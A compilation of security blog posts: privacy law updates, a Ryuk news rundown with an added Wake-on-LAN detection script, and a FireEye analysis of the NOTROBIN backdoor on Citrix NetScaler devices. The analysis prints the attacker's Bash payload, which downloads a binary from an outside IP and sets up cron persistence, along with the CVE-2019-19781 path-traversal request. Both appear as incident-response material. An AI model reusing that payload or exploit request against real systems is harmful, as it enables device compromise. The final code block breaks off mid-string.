Learn more about risk management

Discover what risk management entails with our Certified ISO 27005 ISMS Risk Management Training Course.

In three days, you’ll gain the skills and knowledge needed to implement and maintain a risk management programme based on the best practices outlined in ISO 27005 and other risk management techniques.

Find out more

The post ISO 27001 management review: a practical guide appeared first on IT Governance UK Blog.

In for the weakness, in for the Hack

In my first week of basic training in the Israeli army I was taught that, in terms of information security, there is no item of information too negligible or too small to deal with.

The base’s location, the unit’s name, how big my team is: none of it is to be told. There is no need to brag about the amazing projects we do, and there is no reason to connect external media to computers.

EVERYTHING about information security is important and must be taken care of.

That approach rests on the assumption that a person who has been educated from the very first moment not to disclose the name of the unit (let alone the city it is located in) will be very mindful and aware when handling information with real potential for harm.

This is an excellent and well-proven attitude to security, and I would expect it to be a cornerstone of mission-critical cyber security organisations and industries such as medical, energy, avionics and automotive.

You can imagine how surprised I was when I heard, too many times and from too senior executives at industry-leading companies:

“The distance from weakness, to hack, to actually taking over a vehicle and putting people in jeopardy is very large. We shall not be excited by each vulnerability.”

Technically, to some extent, they are right. The step from weakness to exploitation is significant and sometimes impossible. Not every weakness will end in a ransomware message on your airplane’s infotainment screen.

But this is exactly the kind of reasoning about security events that we must not allow ourselves to become indifferent to.

After all, taking control of a Jeep Cherokee was the result of a combination of weaknesses: exploitation methods, poorly protected communications, and so on.

At the end of the day, every cyber incident begins with a weakness that was not well covered, or was published, or was not addressed; pile great motivation, high technical skill and tenacity on top of that and you get an assault that will make you wanna cry.

As Lao Tzu said, ‘A journey of a thousand miles begins with a single step’.

In the cyber security arena, a small buffer overflow can sometimes be that single step.

With cyber security we must go ‘all in’ and leave nothing to luck. We must identify all the threats and evaluate the degree of exposure each one produces.

This knowledge gives us options to tackle and resolve them: some as simple as a different compiler configuration, some as complex as engaging the supply chain and the development teams, and some that can be solved through operational mechanisms and processes.

I know that this ‘epiphany’ moment about the security status of your product usually causes more headaches than relief, since it usually brings a flood of new issues and gaps, and treating them does not make it easier to meet the schedule or increase the margins.

It is much easier, and more fun, to hide under the warm blanket of blessed ignorance and practise looking surprised.

In my opinion this is not a privilege we have in critical infrastructure, and specifically not in the current era of revolution. We strive for a shared, electronic and autonomous world; a cyber attack will stave off that revolution and deal a severe blow to the spirit of progress we all enjoy anticipating.

I know that the cyber security industry is aware of these needs, and there are solutions (I am sure they can get better) for doing just that: cyber risk assessment, meaning mapping vulnerabilities, finding violations of security policies, checking compliance with the emerging ISO 21434, hardening issues, poorly performing encryption, and even identifying the entire software stack. Risk assessment is conducted to avoid incidents, and the right measures should be devoted to doing just that: avoid incidents, not respond to them. Avoid.

To sum up, as I was told by the first sergeant while patrolling around the base, and as Ivar the Boneless discovered in the last season of Vikings: a single uncovered crack and you may lose the fortress, lose the trust of the people, and find yourself dining with the gods in Valhalla.

Therefore, don’t overlook your flaws and vulnerabilities; progress starts there. Accept yourself (and your imperfect code) as you are and strive for improvement.

Guest blog written by Eddie Lazebnik, who brings 15 years of cyber experience in both the private and public sector and, most recently, in a groundbreaking startup. He served Israeli government and military cyber security organisations for about a decade. He holds an education in business administration, has a proven technical execution record and a great passion for technology and innovation, and is very excited about the IoT revolution, specifically in the automotive industry: connected and autonomous vehicles. These days he leads strategy and strategic partnership activity at Cybellum.

The post In for the weakness, in for the Hack appeared first on CyberDB.

AI, automation emerge as critical tools for cybersecurity

Artificial intelligence and automation adoption rates are rising, and investment plans are high on enterprise radars. AI is in pilots or use at 41% of companies, with another 42% actively researching it, according to the 2019 IDG Digital Business Study.

Cybersecurity has emerged as an ideal use case for these technologies. Digital business has opened a score of new risks and vulnerabilities that, combined with a security skills gap, is weighing down security teams. As a result, more organizations are looking at AI and machine learning as a way to relieve some of the burden on security teams by sifting through high volumes of security data and automating routine tasks.

Identity Management & Access Control in Multiclouds Workshop and Conference

Note: Captions will be provided by February 11, 2020. Co-hosted by Tetrate. This one-and-a-half day conference will focus on identity management and access control in multi-clouds to mitigate insider threats and return control back to owners of applications and data. Emphasis will be placed on emerging concepts such as zero-trust architecture, where gaining entry through a firewall or having an IP address does not provide additional privileges. The workshop will address attacks by implementing mutual TLS, secure service discovery, traffic encryption between services, and access control at the

Kids and Code: Object Oriented Programming with Code Combat

Geez time flies. It's just a tad under 4 years ago that I wrote about teaching kids to code with code.org which is an amazing resource for young ones to start learning programming basics. In that post I shared a photo of my then 6-year-old son Ari holding a Lenovo Yoga 900 I gifted him as part of the Insiders program I'm involved in:

He got a lot of mileage out of that machine and learned a lot about the basics of both code and using a PC. Today seemed like a good time to follow up on that post, starting with a new machine:

This one is a Lenovo Yoga C940 and for full disclosure, it came courtesy of the same program his last one did. The 900 was a great machine but it ultimately succumbed to the sort of treatment you'd expect a 6 / 7 / 8 / 9 / 10-year-old to dish out over a period of 4 years. The new machine times well with him moving into year 5 which, for his school, is the first year that kids need to start bringing a laptop in with them. Curiously, the requirement there is for a Windows-based touch screen machine (I imagine Mac families aren't real happy about that...) which suits the Yoga just fine. Plus, it does the whole bendy flippy "yoga" thing so it can be used in tablet mode too (more on that later):

Flush with good machines myself (I run a ThinkPad P1 as my primary machine and the P50 I wrote about years ago as a backup), when the C940 arrived the other day I thought it was time to do an updated post. I also want to use this post as an opportunity to plug a couple of upcoming free events Ari and I will be running for kids:

  1. DevClub @ NDC Security Oslo, Wednesday 22 Jan
  2. DevClub @ NDC London, Thursday 30 Jan

They both run at the end of the day during the respective NDC conferences and they're a great way to expose kids to code. I wrote about this briefly when we announced the events in November, let's now move on to a few of the Code Combat basics.

Firstly, get into it for free at codecombat.com. Being browser based there's no install, no setups, no elevated privileges required etc etc. Just point and go.

Code Combat takes you through a progression of levels that gradually introduce new concepts akin to the ones we use in everyday "adult" programming. For example, take a look at the following screen:

You'll see the language is set to Python and the code window represents a whole bunch of common programmatic constructs including:

  1. Comments
  2. Variables
  3. Data types
  4. Methods
  5. Arguments

You can run the code as is (this is populated by default at the beginning of each level), but the objective of this particular exercise won't be met so the code will fail. You can then debug the code, modify it and re-run, just like we'd do when writing software as a profession. It's somewhat gamified with heroes fighting enemies and animations that make the whole thing a lot more engaging so at least in our experience, it's something he's quite happy sitting down plugging away at for decent amounts of time without it becoming tedious.

As with most games, as you progress through the levels new concepts are introduced and the complexity increases. For example, some of the aforementioned programmatic constructs are introduced in the "Defense of Plainswood" level:

Keep going further through the levels and more concepts are introduced, including some you'll be pretty familiar with yourself if code is your day job:

So that's Code Combat in a nutshell and I'd highly recommend getting your kids involved with it. If they're a bit younger like Ari was in that first blog post then get them on over to code.org but either way, give them the opportunity to code. I never push either of my kids in this direction (my 7-year-old daughter regularly uses code.org), but I've found just a little bit of exposure has been enough to have them coming back and continually asking to do more. Clearly, they enjoy it (this vid is a good example of where the touch screen and convertibility of the Lenovo Yoga is really handy too):

That's it on the kids coding front for now, if you're in Oslo this week or London next week then do please get along to one of the NDC events, we'd love to see a great turnout of parents and their kids. Who knows, it might just be the spark they need to set them on a passionate (and maybe even professional) coding journey.

Report: A Cyberattack Could Severely Disrupt the US Financial System

A new staff report from the Federal Reserve Bank of New York highlights the risk and potential fallout that a sophisticated cyberattack might have on the United States. In the report, analysts examined a scenario in which a single-day shock hits the country’s payment network, Fedwire, and measured the broad impact it would have on the economy. The result: on average, 38 percent of the network would be affected by significant spillovers to other banks, damaging the stability of the broader financial system in the United States.

How an attack might unfold

According to the analysts, this hypothetical situation would unfold swiftly. It begins with a cyberattack that allows a financial institution to continue receiving payments but prevents it from sending any payments throughout the operating day. Because payments are settled when Fedwire receives requests from senders, an institution’s balance in the system immediately reflects the incoming payments; yet the targeted institution is unable to interact with Fedwire, causing a backup in the system. Essentially, impacted banks would become black holes that absorb liquidity without distributing any money.

Timing matters too and can magnify the impact of a breach. “Attacks on seasonal days associated with greater payment activity are more disruptive relative to non-seasonal days, with average impacts that are about 13 percent greater,” the report says. “We estimate that, on average, attacking on the worst date for a particular large institution adds an additional 25 percent in impairment relative to the case of no specific knowledge.”

The domino effect of liquidity hoarding

An important point from this analysis is that hoarding cash and forgoing payments during a breach can worsen the situation. The report explains, “We find that liquidity hoarding amplifies the network impact of the cyberattack, both increasing the average impact on the system and increasing the maximal risk.” Because banks hold ample reserves and therefore do not necessarily watch daily liquidity conditions closely, they are unlikely to react to these irregularities quickly. Thus, all institutions other than the one impacted by the breach will continue to make payments as usual, resulting in substantial interruptions in the network.

It’s a domino effect that could shake up the whole system. The analysts found a correlation of over 80 percent between assets and payments, and that a small subset of banks plays a vital role in markets such as equities and Treasuries. A cyberattack on a single institution could impede the day-to-day functions of the payment network and cause a headache that extends beyond the impacted institutions and into the wider economy.

Failing to respond to these issues strategically as they unfold can lead to that previously mentioned black hole of liquidity. This problem may be worsened if financial institutions use the same third-party service providers, which offers less incentive for banks to monitor activity and spot abnormalities that can cause liquidity interruptions.

Strengthening security for financial institutions

Considering the above scenario, data from our most recent State of Software Security report (SOSS) indicates that the financial industry has some work to do to shore up its application security. The figures reveal that, in the financial industry specifically, the median time to remediate security flaws in code (MedianTTR) is 67 days, which is higher than nearly every other industry we measured. Information leakage also has a high prevalence at 66 percent as opposed to 63 percent across all industries.

Our data uncovers best practices that are dramatically improving remediation times and reducing overall security debt. The analysis for this year’s report found that when organizations scan their applications for security more than 260 times per year, their median fix time drops from 68 days to 19 days, a 72% reduction.

Get more details on the application security trends and best practices in the full SOSS report.

How Industry Collaboration Created a Unified PIN Standard


On the blog we discuss the joint collaboration between PCI SSC and ASC X9 to create a unified PIN standard with Troy Leach, Senior Vice President of the PCI SSC, and Steve Stevens, Executive Director of ASC X9. In response to industry feedback, the Accredited Standards Committee X9 Inc. (ASC X9) and the PCI Security Standards Council (PCI SSC) have recently completed a joint initiative to create one unified PIN Security Standard for payments stakeholders.

Cyber News Rundown: Ryuk Uses Wake-on-Lan

Reading Time: ~ 2 min.

Ryuk Adds New Features to Increase Devastation

The latest variant of the devastating Ryuk ransomware has been spotted with a new feature that lets it turn on devices connected to the infected network. By taking advantage of Wake-on-LAN functionality, Ryuk can power on sleeping machines, mount them as additional remote targets and extend its encryption to them. While it is possible to allow such wake-up commands only from an administrator’s machine, those machines are also the most likely to be compromised, since they have the broadest access.
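Detection for the behaviour described above, as an added example that is not Webroot’s code: a parser for Wake-on-LAN magic packets and a check that flags them when they come from a host that is not on an allow list of management systems. The packet format (six 0xFF bytes followed by the target MAC repeated sixteen times, optionally followed by a 4- or 6-byte SecureOn password) is the standard one. The allow list, the event records and the IP addresses are constructed for the example, and UDP ports 7 and 9 mentioned in the comments are the conventional wake-up ports, not something the post says about Ryuk.

```python
"""Added example (not Webroot's code): parse Wake-on-LAN magic packets and alert on
wake-ups sent by hosts that are not permitted to send them."""
import ipaddress

WOL_SYNC = b"\xff" * 6          # synchronisation stream that opens every magic packet
MAGIC_LEN = 6 + 16 * 6          # sync stream + target MAC repeated 16 times = 102 bytes
SECUREON_LENS = (0, 4, 6)       # optional password trailer some NICs require


def build_magic_packet(mac: str, secureon: bytes = b"") -> bytes:
    """Build a standard magic packet (used here only to generate test traffic)."""
    mac_bytes = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(mac_bytes) != 6:
        raise ValueError("MAC address must be 6 bytes")
    if len(secureon) not in SECUREON_LENS:
        raise ValueError("SecureOn password must be empty, 4 or 6 bytes")
    return WOL_SYNC + mac_bytes * 16 + secureon


def parse_magic_packet(payload: bytes):
    """Return the target MAC ('aa:bb:cc:dd:ee:ff') if payload is a magic packet, else None.

    Some senders pad before the sync stream, so every run of six 0xFF bytes is tried. The
    body must be exactly one MAC repeated 16 times, the only thing allowed after it is a
    SecureOn trailer, and the all-zero / all-FF MACs are rejected as not real targets.
    """
    start = 0
    while True:
        idx = payload.find(WOL_SYNC, start)
        if idx < 0 or len(payload) - idx < MAGIC_LEN:
            return None
        body = payload[idx + 6: idx + MAGIC_LEN]
        mac = body[:6]
        trailer = len(payload) - (idx + MAGIC_LEN)
        if (body == mac * 16 and trailer in SECUREON_LENS
                and mac not in (b"\x00" * 6, b"\xff" * 6)):
            return ":".join(f"{b:02x}" for b in mac)
        start = idx + 1


def detect_rogue_wol(events, allowed_senders):
    """events: dicts with src, dst, dport and the UDP payload, as a sensor would hand them over.
    Magic packets normally go to UDP 7 or 9 on a broadcast address, but the port is not
    trusted here: anything whose payload parses as a magic packet is examined.
    Returns one alert per magic packet sent by a host outside allowed_senders."""
    allowed = {ipaddress.ip_address(a) for a in allowed_senders}
    alerts = []
    for ev in events:
        mac = parse_magic_packet(ev["payload"])
        if mac is None:
            continue
        if ipaddress.ip_address(ev["src"]) in allowed:
            continue
        alerts.append({"src": ev["src"], "dst": ev["dst"], "dport": ev["dport"],
                       "target_mac": mac})
    return alerts


# Constructed sample traffic: a legitimate wake-up from the management host, a wake-up
# from a workstation that has no business waking other machines, and an unrelated UDP
# packet that happens to contain a run of 0xFF bytes.
ALLOWED_WOL_SENDERS = ["10.0.0.2"]   # assumption: the one host permitted to send wake-ups
SAMPLE_EVENTS = [
    {"src": "10.0.0.2", "dst": "10.0.0.255", "dport": 9,
     "payload": build_magic_packet("00:11:22:33:44:55")},
    {"src": "10.0.0.73", "dst": "10.0.0.255", "dport": 9,
     "payload": build_magic_packet("00:11:22:33:44:66", secureon=b"\x00" * 6)},
    {"src": "10.0.0.73", "dst": "10.0.0.53", "dport": 53,
     "payload": b"\x12\x34\x01\x00\x00\x01" + b"\xff" * 6 + bytes(range(96))},
]


def run_sample():
    return detect_rogue_wol(SAMPLE_EVENTS, ALLOWED_WOL_SENDERS)


if __name__ == "__main__":
    for alert in run_sample():
        print(f"ROGUE WAKE-ON-LAN from {alert['src']} -> {alert['dst']}:{alert['dport']} "
              f"targeting {alert['target_mac']}")
```

A workstation emitting wake-ups to the broadcast address is a strong signal on its own; pairing each alert with the SMB activity that follows from the same source is what turns it into a lateral-movement detection rather than a curiosity.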

Bank Hackers Arrested Outside London

Over the course of six years, two individuals were able to successfully hack into many hundreds of bank and phone accounts with the intent to commit fraud. With the information they gathered, the two were also able to open new credit accounts and take out significant loans to purchase extra tech hardware. Officials for the London Metropolitan Police have made it known that cybercrime is taken just as seriously as any other crime.

Cryptominer Found After Multiple BSODs

Following a series of “blue screens of death” (BSoDs) on a medical company’s network, researchers identified a cryptominer that had spread to more than 800 machines in just a couple of months. The payload, a Monero miner, was hidden inside a WAV file, which let it move between systems undetected before the miner itself executed. To spread, the infection used the long-patched EternalBlue exploit; the network in question had not yet applied the fix, leaving it fully susceptible to attack.

Consulting Firm Exposes Professional Data

Thousands of business professionals from the UK have potentially fallen victim to a data leak by the major consulting firm CHS. A server belonging to the company was found to contain passports, tax info, and other sensitive information that could have been archived from background checks within an unsecured Amazon Web Services bucket. While it is still unclear how long the data was available, researchers who discovered the leak quickly contacted both CERT-UK and Amazon directly, which promptly secured the server.

Western Australian Bank Breached

Over the last week, officials at P&N Bank in Australia have been contacting customers about a data breach that occurred during a server upgrade in early December. Although personally identifiable information was exposed, the data relates mostly to customers’ contact details and no accounts appear to have been illicitly accessed. The total number of affected customers has yet to be confirmed.

The post Cyber News Rundown: Ryuk Uses Wake-on-Lan appeared first on Webroot Blog.

What Website Owners Should Know About Terms and Conditions

All website owners should consider terms and conditions (T&Cs) to be a form of legal protection, as they establish the responsibilities and rights of the parties involved. T&Cs give you a legal basis should anything go amiss and help you settle disputes quickly without having to resort to the courts.

Is it a legal requirement to include T&Cs?
No, but it is always best to include terms and conditions on your website, as they enable you to reduce your potential liabilities. It is essential that you let your customers or visitors know about their rights; if you are not clear about your policies, they may dispute matters such as cancellation options, item returns and other rights, putting your company at a disadvantage. Additionally, if areas of your terms and conditions are unclear or not mentioned at all, you may find yourself obliged to grant your customers rights beyond those given by statute.
Do you have to include GDPR provisions?
Website owners, even those outside the European Union (EU), should also consider incorporating the General Data Protection Regulation. Inserting a data protection clause can reassure your customers that their data will not be used for inappropriate purposes. You can include the majority of the GDPR obligations in your site’s privacy policy.

What should you include in the T&Cs?
If you are an online seller, it is essential to explain to customers the various processes involved, such as:
  • How to make a purchase
  • How to make a payment
  • How they will receive their products
  • How they can cancel orders
T&Cs help you establish boundaries by outlining what specific rights customers have. In return, you also inform them about your obligations as a seller and the limits of your legal liability.

What kind of protection can you expect from the T&Cs? It may not be uncommon for disputes to arise between you and your online customers or visitors. Therefore, it is essential to ensure that the terms and conditions are accessible, preferably on your website.

You also need to protect your website from copyright infringement. You can avoid potential disputes and confusion by specifying which sections are copyrighted and which are your intellectual property. You should also stipulate what visitors may do with your content. If there is any breach of your copyright or intellectual property, the terms and conditions should clearly explain how the problem will be resolved.

Are there standard T&Cs which apply to all websites?
There are general formats or templates of T&Cs that you can obtain for free online. However, there is always the possibility that these documents will not cover specific aspects of your business or will not include the relevant terms. If you omit an essential term from your website, you may find yourself vulnerable if a dispute arises. Therefore, it is critical that you customise your terms and conditions so they are suitable for your website and business. Points that commonly need tailoring include:
  • Product and service offerings – No two businesses are alike, even if you sell the same products and services. For example, your competitor may only accept PayPal but you may allow other modes of payment.
  • Industry or target audience – In every industry, there are specific provisions that need to be included in the T&Cs. For example, customers may have a legal right to cancel or return their purchases within a specified period.
Can website owners enforce their T&Cs?
Your T&Cs are like any other enforceable contract. Nevertheless, you must ensure that they don’t contravene existing consumer laws or government regulations. Remember, you should only incorporate clauses that you can legally apply.

Conclusion
Terms and conditions are necessary for all businesses, including e-commerce sites. It is essential that you create T&Cs that are suitable for your products and services, and that they are legally enforceable. You also need to periodically review your T&Cs, especially if there have been any significant changes to your business structure or the law. Moreover, they must be accessible to your online customers and visitors. If they are not aware of your T&Cs, you may find it difficult to enforce them if a problem arises.

Written by Kerry Gibbs, a legal expert at BEB Contract and Legal Services.

2020 Trend Alert: Consumer Privacy


We are only a few weeks into 2020, and it is safe to say that consumer privacy is all the rage. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights over their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that, if passed, will affect not only consumers but also businesses that operate in these states.

Take a look at the bills, then consider the steps your business can take to help comply with the regulations.

California Consumer Privacy Act

The newly established rights allow consumers to request records of what personal data a business collects about them, to have that data deleted, and to opt out of its sale. The act also regulates the data collected from minors and prevents businesses from discriminating against consumers who choose to exercise their rights.

Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:

  • Gross annual revenue over $25 million
  • Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households
  • Makes over 50 percent of its revenue from selling consumers' data.

To further empower consumers, CCPA has also mandated data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers. 

Washington Privacy Act

On January 13, 2020, Washington State Senator Reuven Carlyle introduced the bill for the Washington Privacy Act (WPA), SB 5376. If passed, the bill will allow residents to see who is accessing their personal data, correct or delete that data, and opt out of targeted advertising and profiling. Controllers will need to conduct data protection assessments of where they process personal data, and additional assessments any time a change to the processing could affect consumers. The bill will also require companies to disclose their data management policies to increase transparency, and it establishes limits on the use of facial recognition technology.

New Hampshire Privacy Act

New Hampshire state representatives Garrett Muscatel and Greg Indruk reintroduced the Act Relative to the Collection of Personal Information by Businesses, HB 1680, in the New Hampshire House of Representatives. The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or to opt out of its sale. It will also give consumers the right to take action if their information is leaked. Like the CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes the data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.

New York Privacy Act

The New York Privacy Act, SB 5642, was referred to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protections, and give consumers a right of action over the misuse of their personal data. Personal data will include biometric information and internet or electronic network activity.

What steps can you take to protect your clients and your business?

These regulations, and others like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our Veracode Verified program gives you a clear AppSec roadmap to follow, helping to ensure that security is woven into your development process.

In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.

Contact us today to learn how to better secure your applications to comply with industry standards.

NIST Releases Version 1.0 of Privacy Framework

Our data-driven society has a tricky balancing act to perform: building innovative products and services that use personal data while still protecting people’s privacy. To help organizations keep this balance, the National Institute of Standards and Technology (NIST) is offering a new tool for managing privacy risk. The agency has just released Version 1.0 of the NIST Privacy Framework: A Tool for Improving Privacy through Enterprise Risk Management. Developed from a draft version in collaboration with a range of stakeholders, the framework provides a useful set of privacy protection

Israeli spyware firm fails to get hacking case dismissed

Judge orders NSO Group to fight case brought by Saudi activist and pay his legal costs

An Israeli judge has rejected an attempt by the spyware firm NSO Group to dismiss a case brought against it by a prominent Saudi activist who alleged that the company’s cyberweapons were used to hack his phone.

The decision could add pressure on the company, which faces multiple accusations that it sold surveillance technology, named Pegasus, to authoritarian regimes and other governments that have allegedly used it to target political activists and journalists.


I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?


404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response; there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven't recovered the POST body contents to see how it works. In any case, exploitation causes the Bash one-liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands include:

  1. Kill and delete all running instances of netscalerd, a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Create a hidden staging directory /tmp/.init, download NOTROBIN into it, and set the execute permission.
  3. Install a crontab entry for /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Execute NOTROBIN manually from /tmp/.init/httpd.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]: (nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively these may be vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a socket listening on UDP port 18634.


Figure 7: File handle listing of a compromised NetScaler device

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET /vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-" "curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.
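The two log entries above, Figure 1 (the staging POST answered with 304) and Figure 8 (the invocation GET answered with 404 once NOTROBIN had removed the template), are the artefacts a responder actually gets to search. The following Go program is an added example written for this page, not FireEye's tooling: it runs a classifier over constructed access-log lines in the same format as the figures and separates the staging request, a blocked invocation and a successful one. The log format, the sample lines and the reading of each status code are assumptions modelled on the figures.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Finding is one request in the NetScaler httpd access log that looks like a
// CVE-2019-19781 exploitation step.
type Finding struct {
	Line    int
	Client  string
	Time    string
	Stage   string // "stage", "invoke" or "traversal"
	Status  int
	Outcome string
}

// Combined-log-format line as the NetScaler httpd writes it (see Figure 1).
var logRe = regexp.MustCompile(
	`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+) "[^"]*" "([^"]*)"`)

// Constructed sample modelled on Figure 1 and Figure 8; not captured data.
const sampleLog = `127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"
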